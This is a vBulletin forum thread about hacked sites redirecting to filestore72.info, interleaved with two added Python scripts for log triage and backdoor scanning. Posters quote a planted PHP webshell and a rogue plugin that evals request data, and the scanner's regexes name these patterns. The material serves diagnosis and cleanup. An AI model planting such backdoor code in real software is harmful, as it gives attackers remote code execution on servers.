Vbulletin 4.2.0 pl3 hacked redirect to filestore72.info

    My site has twice been hacked and redirects to http://filestore72.info/download.php?

    The script only redirects the first time, after the browser has cleared its cache and temp files, and only redirects when coming from a Google search; if you go to the browser and enter the URL manually the script doesn't redirect to http://filestore72.info/download.php?

    My site:
    vBulletin 4.2.0 Patch Level 3
    Tabs en vBulletin 4.x 2.0.3
    Tapatalk 4.3.0
    vBSEO 3.6.0 pl2
    Fuzzy SEO Booster 3 1.5.0b_costum
    vBSEO :: Sitemap Generator 3.0
    VSa - Advanced Forum Statistics 7.1
    VSa - ChatBox 3.1.8
    VSa - Sub-Forum Manager 3.1.4


    After a quick search on the web I found other vBulletin sites with this problem.
    Go to Google, enter this to search and then click the first result site; you will be redirected to another site, "filestore72.info":

    Code:
    rapisalive.com faq
    Missing SOH data sim-outhouse
    sonicownersforum Iraqivet's build

    Anyone have a clue where the hole is?

    - - - Updated - - -

    When I turn off the Tapatalk plugin and activate it again the problem goes away, but after 24 hours the same problem is back.

  • Joe D.
    replied
    Yes, I would uninstall VBSEO

    vBSEO is down, but luckily the uninstall instructions, with the URL rewrite rules so links don't break, are still available in the "Way Back" machine - http://web.archive.org/web/201301221...all-vbseo-238/



  • RichieBoy67
    replied
    I have done the best I can to make it secure but my advice would be to remove that old version. What do you think Joe? I always value your opinions.

    Thanks



  • Joe D.
    replied
    There is no patch I have ever seen.



  • RichieBoy67
    replied
    Hey guys, I am working on a client site with a similar issue and I believe it is tied to the use of vBSEO 3.6. He is using vBulletin 4.2 but still has vBSEO 3.6 and, seeing as vBSEO no longer exists, he has no way to get the latest version. Is there a patch available to fix this without doing an upgrade?

    Thanks



  • PET
    replied
    up.

    I deleted that PHP.INI.

    I also found a new my.log file in the root.



  • PET
    replied
    Ok I'm digging deeper.

    I just found a file called my.log in the root of the forum. It contains 2 users' info, like this:

    Code:
    Array
    (
        [userid] => 11582
        [usergroupid] => 25
        [membergroupids] =>
        [infractiongroupids] =>
        [username] => username here
        [password] => password here
        [salt] => salt code here
        [email] => email.address.here
    )
    The error log file is full of entries like this:

    Code:
    [Sun Nov 10 06:36:29 2013] [error] [client 178.151.216.90] (36)File name too long: access to /index.php++++++++++++++++++++++++++++++++++++++++++++++++Result:+\xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed+\xed\xe8\xea\xed\xe5\xe9\xec+"Myncalleleabs";+\xe2\xf5\xee\xe4+\xe2+\xe0\xea\xea\xe0\xf3\xed\xf2+\xed\xe5+\xf3\xe4\xe0\xeb\xf1\xff;+Result:+\xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed+\xed\xe8\xea\xed\xe5\xe9\xec+"Guedgecrele";+\xe2\xf5\xee\xe4+\xe2+\xe0\xea\xea\xe0\xf3\xed\xf2+\xed\xe5+\xf3\xe4\xe0\xeb\xf1\xff;+Result:+\xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed+\xed\xe8\xea\xed\xe5\xe9\xec+"Guedgecrele";+\xe2\xf5\xee\xe4+\xe2+\xe0\xea\xea\xe0\xf3\xed\xf2+\xed\xe5+\xf3\xe4\xe0\xeb\xf1\xff;+Result:+\xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed+\xed\xe8\xea\xed\xe5\xe9\xec+"Myncalleleabs";+\xe2\xf5\xee\xe4+\xe2+\xe0\xea\xea\xe0\xf3\xed\xf2+\xed\xe5+\xf3\xe4\xe0\xeb\xf1\xff; failed, referer: http://forum.censored.de/index.php++++++++++++++++++++++++++++++++++++++++++++++++Result:+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%ED+%ED%E8%EA%ED%E5%E9%EC+%22Myncalleleabs%22;+%E2%F5%EE%E4+%E2+%E0%EA%EA%E0%F3%ED%F2+%ED%E5+%F3%E4%E0%EB%F1%FF;+Result:+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%ED+%ED%E8%EA%ED%E5%E9%EC+%22Guedgecrele%22;+%E2%F5%EE%E4+%E2+%E0%EA%EA%E0%F3%ED%F2+%ED%E5+%F3%E4%E0%EB%F1%FF;+Result:+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%ED+%ED%E8%EA%ED%E5%E9%EC+%22Guedgecrele%22;+%E2%F5%EE%E4+%E2+%E0%EA%EA%E0%F3%ED%F2+%ED%E5+%F3%E4%E0%EB%F1%FF;+Result:+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%ED+%ED%E8%EA%ED%E5%E9%EC+%22Myncalleleabs%22;+%E2%F5%EE%E4+%E2+%E0%EA%EA%E0%F3%ED%F2+%ED%E5+%F3%E4%E0%EB%F1%FF;
    [Sun Nov 10 06:37:26 2013] [error] [client 74.91.17.226] (36)File name too long: access to /index.php+++++++++++++++++++++++++++++++++Result:+using+proxy+184.73.192.181:3128;+GET-timeouts+1;+chosen+nickname+"bamilesqshuzea3914";+ReCaptcha+decoded;+(JS);+registered+(registering+only+mode+is+ON);+TryAntiSFS=1;+Result:+chosen+nickname+"bjnessdark9685";+ReCaptcha+decoded;+(JS);+registered+(registering+only+mode+is+ON);+TryAntiSFS=1; failed, referer: http://forum.censored/index.php+++++++++++++++++++++++++++++++++Result:+using+proxy+184.73.192.181:3128;+GET-timeouts+1;+chosen+nickname+%22bamilesqshuzea3914%22;+ReCaptcha+decoded;+%28JS%29;+registered+%28registering+only+mode+is+ON%29;+TryAntiSFS=1;+Result:+chosen+nickname+%22bjnessdark9685%22;+ReCaptcha+decoded;+%28JS%29;+registered+%28registering+only+mode+is+ON%29;+TryAntiSFS=1;
    I also have a php.ini file in my forum root that has this:

    Code:
    <?
    echo ini_get("safe_mode");
    echo ini_get("open_basedir");
    include($_GET["file"]);
    ini_restore("safe_mode");
    ini_restore("open_basedir");
    echo ini_get("safe_mode");
    echo ini_get("open_basedir");
    include($_GET["ss"]);
    ?>

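The error_log entries quoted above are the kind of thing worth triaging before chasing the redirect itself: a request path stuffed with "Result: ..." status text is a registration bot reporting its own progress into the URL, and the useful output for a defender is which client IPs produce them, which proxies and nicknames they mention, and what the escaped bytes say. The script below is an added example, not something posted in the thread; its log lines are constructed in the same shape as the page's entries (documentation IPs, invented nicknames), and it assumes the high bytes are Windows-1251 text, which is what the page's `\xHH` sequences look like.

```python
"""Triage of Apache error_log lines like the ones quoted in the thread.

The sample lines below are constructed for this example (documentation IPs,
invented nicknames); they copy the shape of the page's entries, not their data.
Apache writes non-printable bytes in error_log as \\xHH escapes, and the high
bytes in the page's entries look like Windows-1251 text, so the decoder assumes
that code page.
"""
import re
from collections import Counter

# Constructed sample (not a real server's log).
SAMPLE_LOG = r"""
[Sun Nov 10 06:36:29 2013] [error] [client 192.0.2.10] (36)File name too long: access to /index.php++++Result:+\xe2\xf5\xee\xe4+failed;+Result:+chosen+nickname+"botuser123";+ReCaptcha+decoded; failed, referer: http://forum.example/index.php
[Sun Nov 10 06:37:26 2013] [error] [client 192.0.2.11] (36)File name too long: access to /index.php++++Result:+using+proxy+198.51.100.7:3128;+chosen+nickname+"spam9685";+registered; failed, referer: http://forum.example/index.php
[Sun Nov 10 06:38:00 2013] [error] [client 192.0.2.10] (36)File name too long: access to /index.php++++Result:+chosen+nickname+"botuser124"; failed, referer: http://forum.example/index.php
[Sun Nov 10 06:39:00 2013] [error] [client 203.0.113.5] File does not exist: /var/www/favicon.ico
"""

LINE_RE = re.compile(
    r'^\[(?P<ts>[^\]]+)\] \[error\] \[client (?P<ip>[^\]]+)\] '
    r'\(36\)File name too long: access to (?P<path>\S+) failed'
)
NICK_RE = re.compile(r'nickname\+"([^"]+)"')
PROXY_RE = re.compile(r'proxy\+(\d{1,3}(?:\.\d{1,3}){3}:\d+)')
ESC_RE = re.compile(r'\\x([0-9a-fA-F]{2})')


def decode_report(path):
    """Turn the '+'-joined, \\xHH-escaped bot report into readable text."""
    # Each \xHH escape becomes the byte it stands for (latin-1 is a 1:1 byte map),
    # then the whole thing is read as Windows-1251 (assumption, see module docstring).
    raw = ESC_RE.sub(lambda m: chr(int(m.group(1), 16)), path).encode('latin-1')
    return raw.decode('cp1251', errors='replace').replace('+', ' ')


def parse_line(line):
    """Return a dict for a 'File name too long' bot entry, or None for other lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    path = m.group('path')
    proxy = PROXY_RE.search(path)
    return {
        'ts': m.group('ts'),
        'ip': m.group('ip'),
        'path': path,
        'results': path.count('Result:'),      # how many status reports are packed in
        'nicknames': NICK_RE.findall(path),    # account names the bot says it used
        'proxy': proxy.group(1) if proxy else None,
    }


def triage(log_text):
    """Summarise bot entries: hits per client IP, nicknames and proxies seen."""
    events = [e for e in map(parse_line, log_text.splitlines()) if e]
    return {
        'events': events,
        'per_ip': Counter(e['ip'] for e in events),
        'nicknames': sorted({n for e in events for n in e['nicknames']}),
        'proxies': sorted({e['proxy'] for e in events if e['proxy']}),
    }


if __name__ == '__main__':
    summary = triage(SAMPLE_LOG)
    for ip, n in summary['per_ip'].most_common():
        print(f'{ip}: {n} bot entries')
    print('nicknames:', summary['nicknames'])
    print('proxies:', summary['proxies'])
    print('first report:', decode_report(summary['events'][0]['path']))
```

Run it against a real error_log by passing the file's text to `triage()`. The per-IP counts and proxy list are what you would feed into a block list or rate limit, and the nicknames are worth checking against the user table for accounts the bot actually managed to create. Note that these entries are a separate nuisance from the redirect: they show automated registration attempts hitting the forum, while the thread locates the redirect code itself in a plugin row and in the dropped php.ini.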


  • Lynne
    replied
    Have you looked through your access_logs to see what is going on?



  • PET
    replied
    1. They are ok. No one who should not have access is getting access.
    2. We had one 3 months ago that we deleted; that one probably gained access through some PHP root files I found and deleted.
    4. I went through each of them and disabled them one by one.

    Filestore still comes back after 1-2 days. Really no idea what to do.

    vBulletin is running 4.2.1 (yes I know there is a 4.2.2)
    All old vB files got deleted. All extra PHP files got deleted.
    Found some PHP root files in attachment folders; all got deleted.
    I protected the 777 folders.
    Checked the template

    So no rogue admins, no root php files.

    Filestore still comes back.



    Thanks



  • Mark.B
    replied
    Change your admin passwords.
    Check for any admins you don't recognise.
    Password protect your admincp folder using .htaccess
    Go through each plugin and delete any that you don't recognise.

    If you're still having problems after that, please start your own topic with full details of the problem.



  • PET
    replied
    Ok my problem persists. Any ideas?

    I don't use vBSEO. I have disabled plugins one by one. The filestore hack always comes back after 1-2 days.



  • PET
    replied
    Ok. I'm also posting here. Same problem. No vBSEO installed. Did everything that's been suggested. The filestore problem still persists even after the upgrade.

    I'm looking into plugins and I see this:
    A Plugin Named: 123
    Product: vBulletin
    Hook Location: faq_complete

    This is the code:

    Code:
    eval(stripslashes($_REQUEST[ass]));
    No idea what this is, so I just deactivated it.


    Do you have any ideas on how to fix this? It keeps coming back.

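The plugin "123" on hook faq_complete quoted above and the php.ini dropped in the forum root (PET's later post) are the same backdoor shape in two places: code that hands request data straight to eval() or include(). Both can be found mechanically rather than by disabling plugins one by one. The scanner below is an added example, not code from the thread or from vBulletin; its sample file contents and plugin rows are constructed here (the backdoored entries mirror what the thread quotes, while config.php, "Forum Stats" and fetch_stats are invented benign filler), and `scan_plugin_rows` assumes rows with the title, hook and phpcode fields the post lists.

```python
"""Look for the two backdoor shapes quoted in this thread: a dropped file that
includes or evals request data (the 'php.ini' in the forum root) and a vBulletin
plugin row whose phpcode does the same (the plugin '123' on hook faq_complete).

The sample file contents and plugin rows below are constructed for this example;
the benign entries (config.php, 'Forum Stats', fetch_stats) are invented.
"""
import os
import re

# A PHP superglobal being indexed: $_GET[, $_REQUEST[ ...
SUPERGLOBAL = r'\$_(?:GET|POST|REQUEST|COOKIE)\s*\['
# Zero or more wrapping calls, e.g. stripslashes( ... ) or base64_decode( ... )
WRAPPED = r'(?:\w+\s*\(\s*)*'

INDICATORS = [
    ('eval() of request data',
     re.compile(r'\beval\s*\(\s*' + WRAPPED + SUPERGLOBAL)),
    ('include/require of request data',
     re.compile(r'\b(?:include|require)(?:_once)?\s*\(?\s*' + WRAPPED + SUPERGLOBAL)),
    ('eval() of base64-decoded data',
     re.compile(r'\beval\s*\(\s*' + WRAPPED + r'base64_decode\s*\(')),
    ('ini_restore() of safe_mode/open_basedir',
     re.compile(r'\bini_restore\s*\(\s*["\'](?:safe_mode|open_basedir)["\']')),
]


def find_indicators(code):
    """Names of every indicator pattern that matches the given PHP source."""
    return [name for name, rx in INDICATORS if rx.search(code)]


def scan_sources(sources):
    """sources: {path: file content}. Returns {path: [indicators]} for files with hits."""
    hits = {}
    for path, content in sources.items():
        found = find_indicators(content)
        # php.ini is a configuration file; a PHP open tag in it means it was planted.
        if os.path.basename(path).lower() == 'php.ini' and '<?' in content:
            found.insert(0, 'PHP code inside a php.ini-named file')
        if found:
            hits[path] = found
    return hits


def scan_directory(root):
    """Read every .php file and every php.ini under root and scan them."""
    sources = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith('.php') or name.lower() == 'php.ini':
                full = os.path.join(dirpath, name)
                with open(full, encoding='utf-8', errors='ignore') as fh:
                    sources[full] = fh.read()
    return scan_sources(sources)


def scan_plugin_rows(rows):
    """rows: dicts with 'title', 'hookname', 'phpcode' (the fields the thread's post
    lists for a plugin). Returns (title, hookname, indicators) for suspicious rows."""
    out = []
    for row in rows:
        found = find_indicators(row['phpcode'])
        if found:
            out.append((row['title'], row['hookname'], found))
    return out


# Constructed samples: the first file and the '123' plugin mirror what the thread quotes.
SAMPLE_FILES = {
    'forum/php.ini': (
        '<?\n'
        'echo ini_get("safe_mode");\n'
        'include($_GET["file"]);\n'
        'ini_restore("safe_mode");\n'
        'ini_restore("open_basedir");\n'
        'include($_GET["ss"]);\n'
        '?>\n'
    ),
    'forum/includes/config.php': '<?php\n$config["Database"]["dbname"] = "forum";\n',
}
SAMPLE_PLUGINS = [
    {'title': 'Forum Stats', 'hookname': 'forumhome_complete',
     'phpcode': '$stats = fetch_stats($vbulletin);'},
    {'title': '123', 'hookname': 'faq_complete',
     'phpcode': 'eval(stripslashes($_REQUEST[ass]));'},
]

if __name__ == '__main__':
    for path, found in scan_sources(SAMPLE_FILES).items():
        print(path, '->', ', '.join(found))
    for title, hook, found in scan_plugin_rows(SAMPLE_PLUGINS):
        print(f'plugin {title!r} on {hook}:', ', '.join(found))
```

Point `scan_directory()` at the forum's document root for the file side, and feed `scan_plugin_rows()` the rows of the plugin table for the database side. A hit in the plugin table is only cleared from the running site once the product is disabled and re-enabled so the datastore copy is rebuilt (Joe D.'s advice below), and a clean scan stays clean only if whatever re-plants the row every day or two is closed as well; the thread's consensus is that this was the outdated vBSEO install.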


  • Joe D.
    replied
    Look at the links in Post # 3, and update VBSEO.

    To clear the current infection just go to the Admin CP -> Plugins & Products -> Product Manager and DISABLE then Re-Enable any product listed. This will force a refresh of the datastore which is where the code usually is.



  • postcd
    replied
    I'm having the same issue.



  • EliasAlucard
    replied
    Originally posted by Zachery:
    Any third party addons can have exploits, we don't track those. And unless the addon developer gets a notification about them, they might not be fixed.
    But do all third party addons ALWAYS have exploits? I'm trying to pinpoint the plugins we have in common here, if the exploit is actually in the plugin.
